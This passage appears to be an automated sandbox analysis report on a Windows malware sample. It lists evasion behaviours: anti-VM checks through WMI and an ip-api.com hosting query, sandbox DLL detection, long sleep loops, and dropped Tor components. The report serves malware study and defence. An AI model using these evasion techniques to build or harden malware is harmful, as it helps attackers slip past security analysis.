Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ffmaba.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ffmaba.exe PID: 2300, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 2590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 2490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 57F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 67F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 6A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 7A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 2A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 4BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 2550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 27D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 2550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 5A80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 6A80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 5A80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 4D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 7180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 73C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 83C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 9EA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: AEA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6930000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 1070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2B90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 1070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 5E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 5E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 7220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2410000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 25F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 45F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 5940000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6940000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 5940000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2E60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6120000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 7120000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6120000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599782
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598703
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594096
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 593969
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6893	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2756	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Window / User API: threadDelayed 6850	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Window / User API: threadDelayed 2982	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6689	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3097	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6101	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3646	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7889
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Window / User API: threadDelayed 6187
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Window / User API: threadDelayed 3589
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9158
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7736
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8662
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 668
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9321
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9532

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exe	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe

API coverage: 0.2 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe TID: 6160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe TID: 7684	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep count: 6101 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep count: 3646 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe TID: 7804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599782s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599657s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599532s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599313s >= -30000s
